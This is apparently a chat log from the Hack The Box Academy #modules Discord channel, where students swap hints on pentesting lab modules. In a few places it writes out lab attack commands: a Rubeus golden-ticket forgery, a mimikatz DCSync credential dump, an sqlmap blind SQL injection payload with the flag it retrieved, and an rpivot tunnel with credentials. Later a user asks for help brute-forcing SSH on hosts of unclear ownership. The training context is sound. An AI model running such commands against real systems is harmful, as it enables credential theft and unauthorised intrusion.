#modules

1 messages · Page 314 of 1

dim wolf
#

completing CBBH, CPTS, and CDSA job role paths will not net you enough cubes to buy one Tier IV module

copper fox
#

@acoustic owl The payload is being injected in url parameter. And it changing thing in body of the html

jade latch
dim wolf
#

Tier IV modules cost 1000 cubes

signal berry
#

do solutions from one lab to another transfer over in the same module? eg. I'm currently doing the footprinting hard lab... i found some credentials in the medium lab, should I try them inside my hard lab?

acoustic owl
copper fox
#

But this code is valid see once

jade latch
dim wolf
#

i just added up the cube rewards of each module in all the paths and the total does not amount to 1000.

acoustic owl
jade latch
#

oh

#

how much?

dim wolf
#

it could be that i'm calculating it wrong, but i checked twice and it's not enough

#

you should have 840 cubes after completing all three paths

copper fox
acoustic owl
halcyon sand
normal laurel
#

Hey, I'm having a bit of troubles with Password Attacks - Credential Hunting in Windows

Question: What credentials does Bob use with WinSCP to connect to the file server? (Format: username:password, Case-Sensitive)

I used ||Lazagne.exe|| and got a credential, I put it into the answer box and it says it's incorrect, and it is in the right format as well...

plucky hollow
#

What addressing mechanism is used at the Link Layer of the TCP/IP model?

fathom pendant
#

You don't need to use alert

hushed sail
#

or just in the course material tbh

fathom pendant
#

And don't share your payload as it can be a spoiler

plucky hollow
hushed sail
#

maybe you’re formatting the answer incorrectly

fathom pendant
#

But Payload's point is; look where your payload is getting injected

#

You need to escape that first

lean crane
#

Question. I’m new here. Are we able to go from knowing basically nothing to being relatively proficient using hack the box?

hushed sail
hushed sail
fathom pendant
#

Please stop sharing your payload @copper fox as it can be a spoiler, you're close but not quite there. Why would you use alert? Also look at the source code of the page you're testing on

#

If you're not testing, you should be able to test it on the /phishing/index.php iirc

copper fox
digital crown
#

do you guys also have this issue with black screen of rdp?

fathom pendant
fathom pendant
digital crown
copper fox
fathom pendant
#

Again

#

View the page source

plucky hollow
fathom pendant
#

Look where your payload is being thrown into

hushed sail
plucky hollow
#

the answer just needs a cipher between the words

copper fox
hushed sail
fathom pendant
#

To inject code you need several things

#

The <script></script> tags

copper fox
#

Did that too

fathom pendant
#

And of course a place for the payload to actually run

#

Did you view the page source

copper fox
#

yea

fathom pendant
#

To see how you might be able to get out of the tag you're thrown into?

copper fox
#

should I share?

fathom pendant
#

You must first escape the html tag you're thrown into

fathom pendant
#

then your payload can detonate

#

But also

#

alert isn't doing what you think it's doing

#

Alert pops a message up on the screen

copper fox
#

yea but it's not doing

fathom pendant
#

sigh

#

If you're trying to phish someone, why would you have an alert pop up?

#

You can do this without alert

acoustic owl
fathom pendant
#

Nowhere in the phishing section mentions alert()

copper fox
fathom pendant
#

Anyway

#

Start from the beginning

#

Just get any payload to work

#

Also, as a note, the section gets you 90% of the way there the other 10% is using knowledge from previous sections to actually get it to work

copper fox
stark lark
acoustic owl
fathom pendant
#

That's just how you're interpreting it

acoustic owl
#

We try to push you onto the right track

copper fox
#

I'm really taking notes, not just putting random payloads. Thank you guys

copper fox
digital crown
#

but im not sure how much its covered here

stark lark
digital crown
stark lark
#

Phew

copper fox
#

@acoustic owl man it worked thanks alot again

#

I read the source page carefully and found a flaw in that

sly trench
#

Guys I'm in pentester path, information gathering-web edition, skills assessment. I think I have a problem with the box period. I could only solve the first two questions which were very basic, I tried brute forcing directories and sub domains with different wordlists and nothing shows up, i tried crawling with scrapy and the .json file is always empty. Idk what the hell im supposed to do. I bruteforced the vhost and found a few status 400 names but I can't find them on the browser but gobuster decided to show them to me

fathom pendant
fathom pendant
lean crane
swift laurel
#

@lean crane it looks like some of the fundamentals are under the Tier1 which isn't free I believe

fathom pendant
sly trench
#

I tried subdomains already

fathom pendant
#

There are subdomains

#

You may need to adjust your filter

sly trench
fathom pendant
fathom pendant
#

You'll need to filter the results you get with ffuf to toss junk results

sinful mirage
#

my terminal is freezing, anyone know why? i am on the information security foundations, linux fundamentals, i have connected to the htb-student machine using my own terminal but it keeps freezing up

fathom pendant
#

You can either manually set it or use -ac to have ffuf determine automatically

fathom pendant
sly trench
fathom pendant
sinful mirage
fathom pendant
rocky mist
#

"Value 'tun0' is not valid for option 'LHOST'." whys my metasploit saying this?

hushed sail
fathom pendant
fathom pendant
hushed sail
fathom pendant
#

Some of the intro to x modules are not tier0 but are fundamental

hushed sail
sly trench
fathom pendant
rocky mist
swift laurel
#

do you have your vpn connected>

fathom pendant
#

Well on academy, there's a handy button to download it

rocky mist
#

ohh its cuz my vpn thingy wasnt connecting so i tried doing it without

#

do i have to connect everytime i start my vm?

swift laurel
#

yes

#

if you want to interact with the targets

rocky mist
#

like download a new file and all? or reuse the same one

swift laurel
#

ive been reusing, I think you only redownload if switching servers

rocky mist
swift laurel
#

..that im not sure, I minimize mine.

fathom pendant
#

When you close it, it stops the process running the openvpn connection

clear coral
#

I'm trying to complete the Skill Assessment for Using Web Proxies and I'm having some trouble with the final question

hushed sail
clear coral
#

I'm setting the PROXIES option within msfconsole to 127.0.0.1:8080, but Burpsuite isn't intercepting it

sly trench
# fathom pendant --append-domain

So it found one domain but it doesn't load even with curl command. How can a DNS server not run if a website is supposed to have subdomains?

jade latch
#

add to hosts file

fathom pendant
clear coral
fathom pendant
#

If it were a socks proxy you'd do socks:ip:port... and so on

rocky mist
#

why do i keep getting the command "Msf::OptionValidateError The following options failed to validate: RHOSTS"

sly trench
fathom pendant
fathom pendant
rocky mist
fathom pendant
#

Also you can't get a reverse shell on public hosts

rocky mist
rocky mist
fathom pendant
#

So if your exploit is a reverse shell of some kind, it's the wrong exploit

fathom pendant
#

With gobuster add --append-domain

gusty cloak
#

anyone have a fix for bloodhound data just stuck uploading forever?

#

@fathom pendant what magic do you know about this

fathom pendant
#

Regrab the data

#

Likely it got corrupted

gusty cloak
#

tried that, happens with almost every single machine i do it on

#

it works flawlessly with the python version but i cant use it in this case

#

like theres a 95% chance the data will not work

fathom pendant
#

I've not had many issues with data grabbed from the sharp hound on the ad enum boxes

sly trench
#

So basically when I am trying to find subdomains of a vhosts you shouldn't use DNS flag in gobuster but vhost and --append-domain right?

fathom pendant
#

Generally yes but it depends

#

dns flag relies on dns servers to resolve

#

Instead of host header manipulation

#

Where it asks the server you're attacking directly

#

dns uses public dns servers
vhost uses the site itself you're targeting

signal berry
#

small question, i just finished the footprinting hard lab, and i think a little by chance. how should i have known that particular services were running on the device? was it correct of me to just guess ps -aux | grep service-name based on the files of the user i found?

fathom pendant
#

In one of the things you may have read

signal berry
#

it doesn't, the leading text is :

The third server is an MX and management server for the internal network. Subsequently, this server has the function of a backup server for the internal accounts in the domain. Accordingly, a user named HTB was also created here, whose credentials we need to access.

fathom pendant
#

Generally if something is a backup of internal accounts there may just be a database running

signal berry
#

i see, but it could have been any kind of database, not ?

fathom pendant
signal berry
#

i see. i wasn't that far off then in that case!

#

thank you Marcielee 🙂

fathom pendant
#

Also

#

always scan the targets that are 10.129.x.x

#

Don't assume htb is giving you all the information

#

Just enough to get started

#

But assuming things in the enumeration phase can lead to needing to re-enumerate your baseline later

signal berry
#

scanning 10.129.x.x didn't reveal the above ^

#

at least for me, maybe my scan was off

fathom pendant
#

Well if a service is only running internally, it may not reveal anything

#

If you're curious as well about running services, netstat is a useful command

#

Instead of just ps aux which gives process info

sinful mirage
#

guys, when i run a command that takes a lot of time to execute, is there a way to cancel it?

signal berry
#

control C

fathom pendant
#

Ctrl - c
Cancel this shit bc I think I fucked up with how long it's taking

sinful mirage
#

basically

#

im trying to find the email of the user

signal berry
#

story of my life.

sinful mirage
#

and im greping all around, cant find it still

fathom pendant
#

As a note, not everything in this field is instant gratification

#

Sometimes you do have to wait upwards of 30+ minutes for a command to work

sinful mirage
#

thanks for the info, but right now im in a period of thinking "is this command supposed to take this long to execute or have i written something very stupid that made my terminal freeze"

#

i guess it comes with the experience

fathom pendant
#

What module and section

sinful mirage
#

linux fundamentals, system information

#

i have a task to find the email of the user

fathom pendant
#

Ah

#

This question is actually really easy

#

Look through the listed commands and see what each do

#

One of them will give you a useful bit of info about of a lot of things about your environment

#

Also as a note, the filepath doesn't need to exist to be assigned

sinful mirage
#

thanks, ill try to find it, i have been going trough various file directories trying to find it

fathom pendant
sinful mirage
#

alright that was easy, the thing is that i have already found a path earlier but i forgot to include the user name in the file path

#

thanks 👍

fathom pendant
sinful mirage
#

that's basically this?

#

the 'root' confused me, why isn't there my user name?

fathom pendant
#

As said

#

A directory doesn't need to exist for it to be assigned to a path

#

Alongside that, this is done on purpose

#

It is to have you go through other enumeration commands

muted jacinth
#

Hey guys. I wondered if anyone could give me a hint about that last question of the dacl attack II skill asessment, i Got every users. the hint isn't really helping. Thx!

sturdy igloo
#

In CBBH Module Need Help

I need help with Broken Authentication - Skills Assessment. I have bruteforced a user and password. I cant brute OTP and read it is not the way. I can't figure out how to bypass, i have tried registering a user and seeing the difference but still no clue. Can anyone help.

sinful mirage
fathom pendant
#

But you can assign any value to a variable

#

Doesn't make it correct

ember fern
#

am I confused

#

what does that mean

fathom pendant
sinful mirage
fathom pendant
#

env isn't a directory

sinful mirage
#

sry, a command

fathom pendant
#

They are assigned variables that depend on context and program utilizing them

#

Like how LS_COLORS dictates the colors of the different file extensions

sinful mirage
#

thats cool, i think i get it

dull thunder
#

i had that problem because my godpotato-net4.exe was 0 bytes. firefox didn’t fully download it because it thought it was harmful.

astral yoke
#

please how do i spanwn up the htb vpn on my kali machine ?

#

i have downloaded it already i worked with it yesterday , but can not ssh into target machine today

dim wolf
#

sudo openvpn /path/to/file.ovpn

unique ether
#

Hello again I'm using chatgpt for some part of the explanations in the modules am I valid or no?

#

Is anyone else doing what I am doing?

trim frost
#

sure, but I'd also take notes

astral yoke
unique ether
# trim frost sure, but I'd also take notes

yea i am currently doing that as well. I have seen alot of other peoples notes its just a list of commands usually. I have been writing notes and points I am not sure if the way I am doing is appropriate or no

cloud urchin
# astral yoke thanks

if you didn't know, you don't need to re-download it every time. you can just re-use the same file. i'd suggest putting the openvpn command down in your notes. also, protip, if you use & at the end of your command it'll drop it into the background and you can close the terminal. sudo openvpn /path/to/file.ovpn & like that

safe star
#

if u know how, u can also make an alias to run it a bit easier

plucky hollow
#

i use: sudo openvpn --config /path/to/file.ovpn

plucky hollow
safe star
#

Ik

plucky hollow
#

nano ~/.bashrc

safe star
plucky hollow
#

and add this line: alias alias_name='command'

plucky hollow
#

i use htb

safe star
#

.zsh on kali

safe star
grand portal
#

There is a footprinting module, oracle tns section. Where section provide a bash script. But it's not running as it is supposed to. I addressed this matter earlier as well.

#

@fathom pendant could you help with this?

#

Here

hard matrix
#

what exactly is your question

cloud urchin
#

you don't really provide any info so kinda hard to help

#

"it doesn't work" isn't a good description

next bronze
#

there's a stack trace after the linked message, either make a python venv or install odat via apt

quiet trout
#

can someone help me with an AD fundamental?

The module https://academy.hackthebox.com/module/74/section/1350

Describes a NTLMv2 Challenge/Response example and i cant seem to decipher what is meant by SC/CC (server->client? client->client? dont think thats right)

SC = 8-byte server challenge, random
CC = 8-byte client challenge, random
CC* = (X, time, CC2, domain name)
v2-Hash = HMAC-MD5(NT-Hash, user name, domain name)
LMv2 = HMAC-MD5(v2-Hash, SC, CC)
NTv2 = HMAC-MD5(v2-Hash, SC, CC*)
response = LMv2 | CC | NTv2 | CC*

edit: nvm the SC stands for Server Challenge and CC for Client Challenge, respectively.

grand portal
grand portal
grand portal
# hard matrix what exactly is your question

I'm not able to properly execute the bash script provided in the Oracle Tns section (to setup odat). But pip3 packages are not installable, gives error (need to create virtual environment etc, you can see more in detail in the follow up above message i provided when asking question)

quiet trout
#

are you using pyenv or venv? you should be using venv i think pyenv is deprecated

#

this tripped me up as a returning python user a few months back as well

#

@grand portal ^

#

also make sure your venv is set to path, the venv autoconfig wizard should check this and alert you

#

added to path* but you know what im sayin

grand portal
quiet trout
grand portal
#

I'm trying to use pipx instead of pip3 from the bash script. Pipx is used to isolate python environment and it's used to install commandline tools. That we want. So I'll keep posted here. If it works as i hope.

quiet trout
#

ok so yeah dont do that, or atleast the REALLY NICE folks over at #python on libera told me not to. pipx defaults to the system install of python, you need to setup your venv then use pip from your newly created environment

#

do which pip3 to make sure its defaulting to your venv

#

i ran into a very similar issue

#

let me see if i can get you some terminal output to help guide you

grand portal
quiet trout
grand portal
#

I don't nedd that really. But i want to run pythons scripts systemwide. Using pip3, will i be able to run msssqlclient.py from any terminal? Did you try?

#

Bash script result from the Oracle Tns section. i know which commands are giving those errors :

  1. pip3 install cx_Oracle
  2. sudo pip3 install colorlog termcolor passlib python-libnmap
  3. pip3 install pycryptodome
next bronze
#

you can and probably should use projects designed for terminal use like impacket/netexec with pipx, basically use the documented way to install. for more complex projects line odat you'll want to create a venv. but again odat is available in apt

grand portal
#

I don't understand the pip3 and virtual environment. If pip3 is responsible for installing packages virtually, so the installed packages can't be accessed outside the virtualization, right? I don't get why they provided that bash script, it needs changes. Or maybe my system is not setup to run it. Because pwnbox ran it without issues.

next bronze
#

pip3 installs packages depending on if it's inside a venv or not

#

if the script works for pwnbox then it works, they can't account for the difference in every system

marsh echo
#

hey guys

#

for skill assessment 1 of common application i founded the vulnerability i can list the directory /Desktop but unable to use type to read the flag and there is no access.cgi file to try to have a reverse shell

grand portal
next bronze
#

no

#

parrot os is maintained by parrot, there is htb people maintaining pwnbox

grand portal
#

alright

#

what is this ?

next bronze
#

that's pwnbox, says it right there

grand portal
#

so the download button is for parrot os not the pwnbox?

next bronze
#

yes

grand portal
#

that's bad, i can't customise my vm as i go through the process. wish there was pwnbox downlaod. guess it's proprietary.

next bronze
#

wdym you can't customise your vm? it's your own vm, do wahtever you want with it

grand portal
next bronze
#

what? whatever you do in your vm stays, it's pwnbox that gets reset

eager ledge
#

Hi everyone, I am doing "Stored XSS" section of "Cross Site Scripting" module https://academy.hackthebox.com/module/103/section/967, and I completed the question. But I do not understand how is it "stealing" cookie? The malicious XSS payload that we add to get the cookie is stored in the database? Sure. But when another user views the same task and the code gets executed, it is executed in the context of that user itself. This means, each user will see their own cookie, which is not bad. So, how does it allow me to view other user's cookies?

frosty tide
#

Hello, I'm doing the Broken Authentication Skill Assessment. I got through the Login and when I got stuck when submitting 2FA it redirect me to login instead.

frosty tide
misty current
#

The section you just did just asks you to execute JS to show yourself the cookie. There isn't any cookie stealing techniques being taught in there

grand portal
autumn pilot
#

pwnbox is parrot

#

if you want to configure it you can do it via ansible - https://www.youtube.com/watch?v=2y68gluYTcc

The Github Repo: https://github.com/IppSec/parrot-build

00:00 - Intro downloading the HTB Edition of Parrot and talking about basic VM Things
02:20 - Talking about using Ansible to install software after and why we should not use Snapshot's for a long-term solution.
04:00 - Parrot has been installed! Fixing up the Terminal real quick and talkin...

▶ Play video
grand portal
autumn pilot
#

you can navigate it is not that hard

grand portal
#

Gotcha. However interface has gotten wierd.

fathom pendant
#

¯_(ツ)_/¯

fathom pendant
grand portal
fathom pendant
#

The HTB-edition is close but it isn't exact

grand portal
#

I see. still better than other editions.

fathom pendant
#

Not really lmao

grand portal
#

how so? im using security edition so far.

fathom pendant
#

Htb-edition is just security edition with a trench coat

grand portal
#

what, really? i thought i would not have to manually install many tools. just a offline pwnbox

fathom pendant
#

You'll still have to install tools

#

Even the pwnbox you need to install tools

#

The advantage to using your own vm is:
You aren't relying on a third party for your vm, so you always have access to it
Persistence, tools you install remain installed
Version control, you have more control over the version of tools you install

grand portal
#

Thanks, that's been helpful. I've been using security edition so far. gonna continue using it.

north ermine
#

Hello everyone!
I enrolled in the SoC analyst path and I am stuck at the module "Cyber kill chain" at the question "in which stage of the cyber kill chain is malware developed?". I try the answer "weaponize" but I get an error and incorrect answer.
Why is this happening? I believe that this is the correct answer.

winged egret
#

anyone felt like the skills assessment in Security Monitoring & SIEM Fundamentals isnt quite on point ? I mean whats the difference between escalating to tier 2/3 or consulting the IT admins ?

winged egret
north ermine
stark lark
#

Attacking Domain Trusts - Child -> Parent Trusts - from Windows
Performing a DCSync Attack

Can someone tell if I'm doing something wrong?

#

Ticket is cached and PS running as administrator..

winged egret
fathom pendant
#

The mimikatz on the targets should be fine

#

The ticket caching thing can be finicky

#

I remember fighting this for a bit to get it working

mossy drift
#

Hi ! if i have some questions about Practical Digital Forensics Scenario, it's in #1234357888114364508 ?

#

I need some help about a question inside the module

autumn pilot
#

you can ask your question here

grand portal
stark lark
# winged egret Can you explain what have you done until this point ? I suspect it may be an err...

I did the following

Creating a Golden Ticket using Rubeus
PS C:\htb> .\Rubeus.exe golden /rc4:9d765b482771505cbe97411065964d5f /domain:LOGISTICS.INLANEFREIGHT.LOCAL /sid:S-1-5-21-2806153819-209893948-922872689 /sids:S-1-5-21-3842939050-3880317879-2865463114-519 /user:hacker /ptt

Confirming the Ticket is in Memory Using klist
PS C:\htb> klist

Performing a DCSync Attack
PS C:\Tools\mimikatz\x64> .\mimikatz.exe
mimikatz # lsadump::dcsync /user:INLANEFREIGHT\lab_adm

mossy drift
#

ooooh okay thanks !

stark lark
winged egret
mossy drift
#

Introduction to Digital Forensics

Practical Digital Forensics Scenario

Extract and scrutinize the memory content of the suspicious PowerShell process which corresponds to PID 6744.
I find the answer with some luck but i don't understand the process to find it legit. To avoid spoil here we can go mp

grand portal
grand portal
stark lark
mossy drift
#

No its just luck here, i found the powersploit github and try 2 tools

#

but i very need to understand the path

fathom pendant
mossy drift
#

yes but i dont understand what the process did even after decode twice the base64 strings

#

i found the endoded strings with the command line of the process, i decode once, twice and then i don't know where to search haha

still valve
#

Stuck here, ||SharpHound|| is very slow

wild cape
#

Modern Web Exploitation Techniques > Skills Assessment

Heys guys
Stuck on getting the password for "htb-stdnt" and "admin" users, any hint or nudge on the right direction would be really appreciated. Been stuck on this for a couple of days now and I'm not sure what I'm missing.

  • ||Sqli via websockets from library endpoint|| doesn't reveal any password in database
  • Tried ||sql on|| vault endpoint
  • Tried ||password brute force on|| vault endpoint
  • Tried ||command injection||
  • Tried ||directory brute force||
  • Tried to ||access vault.php, profile.php, config.php, db.php after an incorrect login attempt without following redirection, to check if session was temporarily valid||
    Feel like there's nothing else to work with here

Thanks

gilded radish
#

I believe everything in module

#

just read it again

wild cape
#

What exactly should I read again? The module is about dns rebinding, second-order vulnerabilities, and websockets. I would probably be able to exploit this endpoint using ||websockets ||if there was some way to interact with another user, which isn't the case here. Can't find any second-order vulnerability, and dns rebinding isn't possible without pointing the victims dns configuration to my dns server. No doubt it's some simple detail I missed, but it's been a couple of days and I would really appreciate any concrete tip in the right direction.

bright coral
still valve
fringe shell
#

Hi guys, I am doing the Windows Fundamentals Module, I have a problem in terms of connecting to the target, I am also not able to ping it. This has been the first time it happened, I have done the CBBH path without this problem and boxes from the app. Any insights?

#

And also even the Pwnbox is not able to connect to the target host.

deft bone
#

hello could someone help me im new around here and i cant type in general

deft bone
#

i already did

#

because i had wait 10 minutes before typing so i just read that

wary plover
deft bone
#

oh no

wary plover
#

Try that maybe

marsh echo
rustic sage
#

Module Tunneling and port forwarding" Good morning colleagues, I'm stuck on the next question. Using the concepts taught in this section, connect to the web server on the internal network. Submit the flag presented on the home page as the answer. I am trying to access the external web server in the following way and I have already configured tunneling as the module says but I do not have access python2.7 rpivot/client.py --server-ip 0.0.0.0 --server-port 8080 --ntlm-proxy-ip 172.16.5.129 --ntlm-proxy-port 8081 --domain inlanefreight --username victor --password pass@123

acoustic owl
marsh echo
marsh echo
#

is it normal for type not to work?

acoustic owl
winged egret
# marsh echo is it normal for type not to work?

yes its normal , alot of commands may not work through cgi even if you specify the full path ... So you'll have to dig deeper to see what works ... Try to get a reverse shell also because its possible

marsh echo
rustic sage
#

Can you help me

fathom pendant
#

Not unless you ask your question

acoustic owl
rustic sage
#

I dont have acces to the externas server to see the flag

fathom pendant
twin bridge
#

Hello, I really need help getting my head around a question in the CBBH: MySQLMap Module

In the first question in the Attack tuning section, it asks for a flag that can be obtained through an (OR) SQLi vulnerability...
I tried doing it manually but no success.. so I fired up sqlmap and managed to obtain the flag...

#

Anyways, I managed to get the flag but I don't understand how sqlmap retrieved this data...I turned on the verbosity to the max and enabled debugging and traced all the HTTP requests that sqlmap made
and managed to find the query payload that SQLmap used to retrieve the flag (it's in the screenshot below)...however when I try using the same payload manually in the browser I get no results whatsoever...

What am I missing here...why can't I replicate manually it someone help I'm losing my mind lol

This is the part of the HTTP request history that shows the payload that SQLmap used successfully to retrieve the flag from the 'flag5' table in the 'testdb database:

#

[07:34:51] [TRAFFIC IN] HTTP response [#544] (200 OK):
Date: Tue, 27 Aug 2024 11:34:50 GMT
Server: Apache/2.4.38 (Debian)
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 2473
Connection: close
Content-Type: text/html; charset=UTF-8
URI: http://94.237.48.203:38759/case5.php?id=-2723 OR ORD(MID((SELECT content FROM testdb.flag5 ORDER BY id LIMIT 0%2C1)%2C31%2C1))>124
[07:34:51] [INFO] retrieved:** HTB{700_much_r15k_bu7_w0r7h_17}**
[07:34:51] [DEBUG] performed 228 queries in 14.08 seconds
[07:34:51] [INFO] retrieving the length of query output
[07:34:51]** [PAYLOAD] -8722 OR ORD(MID((SELECT CHAR_LENGTH(id) FROM testdb.flag5 ORDER BY id LIMIT 0,1),1,1))>51**
[07:34:51] [TRAFFIC OUT] HTTP request [#545]:
GET /case5.php?id=-8722%20OR%20ORD%28MID%28%28SELECT%20CHAR_LENGTH%28id%29%20FROM%20testdb.flag5%20ORDER%20BY%20id%20LIMIT%200%2C1%29%2C1%2C1%29%29%3E51 HTTP/1.1
Cache-Control: no-cache
User-Agent: sqlmap/1.8.7#stable (https://sqlmap.org)
Referer: http://94.237.48.203:38759/case5.php
Host: 94.237.48.203:38759
Accept: /
Accept-Encoding: gzip,deflate
Connection: close

ember fern
#

based on that fact that it sent 228 queries

#

what is the full description of the SQL vulnerability

#

it should say something like```

Parameter: test (GET)
Type: time-based blind
Title: OR time-based blind - X or Y clause
Payload: test=dfSf' OR ...

misty current
#

Same thoughts as @ember fern

twin bridge
misty current
#

If you're thinking that using the payload in browser is going to give you the flag in one request, it won't.
Blind based attack works by have a integral script in sqlmap that automates the process of extracting data with a lot of requests one by one.

#

Based on a true or false condition

twin bridge
#

Aha I see...so the part in the http request history which said "information received: HTB{.........}" was a result of multiple payloads and requests and not attributed just to the payload and request that was mentioned right above it...correct?

misty current
#

Correct

twin bridge
#

Yeah makes sensee now... thanks a lottt @misty current @ember fern

bright coral
ember fern
#

it's automated

#

(and a little magic)

steady charm
#

Does anyone know if we can run Responder from our attacker machine through a pivot tunnel made with Ligolo?
Or do I need to run responder from a machine within the internal network since it won't work through pivoting

pseudo kiln
#

LLMNR works by sending a multicast packet on the network segment at 224.0.0.252:5355, so it needs to be run from the compromised machine in the internal network.

There may be some network fuckery you can do by configuring a reverse port forward for 224.0.0.252:5355 on the internal machine to send traffic back to the attacker machine and run responder on the attacker to catch it like that, though I have not tried it.

lyric inlet
#

Hello I can ask anyone about advanced deserialization attack module, skills assessments .

#

?

lyric inlet
#

for the blacklisted keyword on skills assessement I doubt its possible to execute command without System.Diagnostics.Process

jaunty mortar
#

Any one completed "ADVANCED XSS AND CSRF EXPLOITATION" section "XSS Filter Bypasses"?
I managed to bypass using <object> or <iframe> payload but cant trigger admin page

restive elm
#

Is this the support channel for general HTBA login issues?

#

I have an issue loging into HTBA. My accounts are linked and I am using the correct password, but when trying to login to HTBA it says These credentials do not match our records. If you have an HTB Account, please proceed connecting through your HTB Account. This is even after I am already logged in within that browser but it pulled up a new page. It's a very kludgy interface.

restive elm
fathom pendant
#

Reach out to support via the green bubble on the website

marsh echo
#

I was able to find the flag but I have a lot of questions x) for skill assessement 1 of Common Application

compact patrolBOT
rustic sage
fathom pendant
#

Try logging in there

restive elm
#

Getting to support is also kludgy 👍

rustic sage
#

Try logging in via HTB account

restive elm
#

Where is the green bubble?

#

Everything is green

fathom pendant
#

Bottom right of the page

#

If you don't see it you likely have adblock enabled

marsh echo
restive elm
compact patrolBOT
restive elm
#

Getting to support? Seems to be

fathom pendant
marsh echo
fathom pendant
#

Basically

#

Yeah

#

I just threw msfconsole at it and said screw it lmao

marsh echo
#

or you can see the module's creator. I'd love to ask him 🙂 because it tortures me to know that I can list the desktop content on the url but not read the directory content with type cmd

jaunty mortar
wild cape
wild cape
jaunty mortar
river jetty
#

Does anyone know how to XML Filter Event Viewer? I'm trying to filter my events for unsigned events.

lyric inlet
#

Finally its OK for advanced serialization attack. Done

vestal spruce
#

Question within the Widows Lateral Movement RDP Section. The question I'm stuck on is:

"Use NetExec to conduct an RDP Password Spray using the hash 'A35289033D176ABAAF6BEAA0AA681400'. Which user successfully authenticated?"

  1. I have tried cracking the hash to no avail and I have attempted to use Netexec with the '-p' switch which has not been able to authenticate. I'm a bit confused because:

  2. Netexec doesn't explicitly state in it's documentation it supports pass the hash so I'm not sure what the switch would be to attempt it

The first target host "SRV01" does not have RestrictedAdmin Mode enabled, nor does it have the corresponding registry at all. I was able to use powershell and determine 'SRV02' does have it, but the question doesn't state to spray to that? I'm just a bit lost

I suppose maybe when I used Get-AD I didn't pull enough of the right users? Or again, not sure if the question wants me to crack the hash (I've gotten weird results with Hashcat), or if it just wants me to realize that SRV02 has RestrictedAdmin and to try there. Additionally the first account you discover on the first target machine does not have admin perms, so can't create the related registry

shut vapor
vestal spruce
#

Still it’s not enabled

#

Or rather, not there at all

#

But I don’t even think that is the main issue here. The main issue is nowhere within netexec documentation does it outline support for “spraying” with hashes.

dapper moth
#

Anyone can give a nudge on the "Whitebox Attacks" Module - Section Client-Side Prototype Pollution?

I found the GET parameter needed for the elevating my privileges, got a valid payload to send a HTTP GET Request tested to my Server, but when I send to the admin via input form, I still can't get access.
Tried via $.get and fetch.

hushed sail
#

Good god. Finally.
That was fun, but lots of unfamiliar territory to work with 🙂
https://academy.hackthebox.com/achievement/698577/112

dapper moth
fathom pendant
vestal spruce
#

That is the wording in the module not mine

dapper moth
fathom pendant
#

I believe the netexec hash flag is -h or -pth

#

¯_(ツ)_/¯

dapper moth
fathom pendant
#

That's fair

dapper moth
fathom pendant
#

I was thinking from the perspective of having obtained the hash yourself via dumps

#

Where you'd have the corresponding username

shut vapor
hushed sail
#

and which is why it took me like a week total to get through.

rich wraith
#

Can somebody help me with Attacking DNS (Attacking Common Services) ? I actually found the flag, but I don't understand something.

#

||subbrute inlanefreight.htb -r ./resolvers.txt||

#

subbrute is working

#

but if I try the same with dnsrecon, it says ,,Could not resolve domain: inlanefreight.htb"

#

||dnsrecon -d inlanefreight.htb -n 10.129.203.6||

gusty galleon
#

Can somebody help me to solve an error arising while using hydra (brute force password cracking tool) :- "cannot connect to ssh"

gusty galleon
#

I tried literally everything!!

#

Can you recommend some command to correct it

storm elk
gusty galleon
#

Wait le me send my screen capture

safe star
storm elk
#

Just the command and output please

storm elk
gusty galleon
safe star
#

Bru

gusty galleon
#

What??

storm elk
#

Are you connected to the vpn?

gusty galleon
safe star
#

😭

storm elk
gusty galleon
#

No actually I was learning with some random Russians

#

And stuck there though the example i took is from internet

gusty galleon
safe star
#

What module are u even on?

gusty galleon
#

So you cannot expect much from me

safe star
#

Are u on the htb website?

gusty galleon
#

But the team I am working with is international (Russian,Dutch etc.)

gusty galleon
#

Help me !!

safe star
#

What room bro

gusty galleon
safe star
#

😵

storm elk
#

If you can’t state the module and section you’re on, we can’t help

gusty galleon
storm elk
#

Then do so

gusty galleon
#

Like you ask my htb module

storm elk
#

Name the module and section you’re working on.

gusty galleon
#

I m just working on brute force

storm elk
#

Where did you get that IP?

gusty galleon
#

I have many more (cuz of Russian friends)

safe star
sacred jacinth
safe star
#

?

gusty galleon
sacred jacinth
#

this discord and channel is for a specific website

#

Im certain no one can help you with what you are asking

gusty galleon
storm elk
gusty galleon
sacred jacinth
#

no

gusty galleon
#

Plsss brother !!

safe star
storm elk
gusty galleon
safe star
#

And u def don’t have a container up 😭

gusty galleon
#

Thanks le Mee activate my vpn 😂(fuckkkkk how I am supposed to do this))

sacred jacinth
safe star
#

Where did u even get that ip😭

sacred jacinth
#

im certain he won't know about the dockers

gusty galleon
sacred jacinth
storm elk
gusty galleon
#

Cause htb or any other resources posses a constraints. But random learning not have limits

gusty galleon
dapper moth
#

People still try
I get it why you guys get pissed sometimes

sacred jacinth
#

honestly the mods and community contributors have a lot of patience

gusty galleon
#

Actually I m not even there 1% they are not hackers they are Russian hackers. And I have fear of getting hack still I m learning from them but still fear is fear

safe star
fathom pendant
#

Anyway

vale island
#

anyone facing issues with RDP ?

gusty galleon
sacred jacinth
safe star
#

Ok

storm elk
fathom pendant
gusty galleon
storm elk
fathom pendant
gusty galleon
fathom pendant
#

Academy is a great place to learn the basics in a controlled environment

gusty galleon
#

And he told me to firstly complete comptia+ os+ network+ and security+ course but I didn't 😅.I m dumb as luffy !!

gusty galleon
dapper moth
#

Hey, @storm elk
Have you done the Whitebox Attacks module?
Can’t seem to find the right payload on the client side prototype pollution section

signal berry
#

can someone give me a lightly better explanation of braa <community string>@<IP>:.1.3.6.* , if im not mistaken, the .1.3.6.* part is the OID, but how is this chosen in the module for me to enumerate against ? is 1.3.6.* randomly chosen ?

storm elk
leaden jacinth
#

Hey guys when submitting answers, in hack the box, do they have to be exact? To move on ? (I’m very new, and I’m pretty sure I have the answer but not the format )

storm elk
#

I believe so. Make sure there’s no leading/trailing spaces

safe star
#

Yeah, I usually have to delete some space behind the flag

rustic sage
#

I have a question. How are we supposed to access the strong password for the decryption key of our operating system if the password manager is inside the operating system?

leaden jacinth
#

I’m just trying to answer “what does the acronym for Linex PAM Stand for ?” And I’m putting “Pluggable Authentication Modules” and it’s not working ?

rustic sage
# safe star Wym? What module

Its part of the Setting Up module, when it talks about strong passwords and reusability. Later on it teaches how to install Linux on a vm with encryption and advises us to use a strong password for the decryption key. But how can you access it if the password manager you're using on the web is inside the os? Do you need to use your phone to access the password manager every time?

sacred jacinth
#

probably a whitespace that you don't see

spring path
#

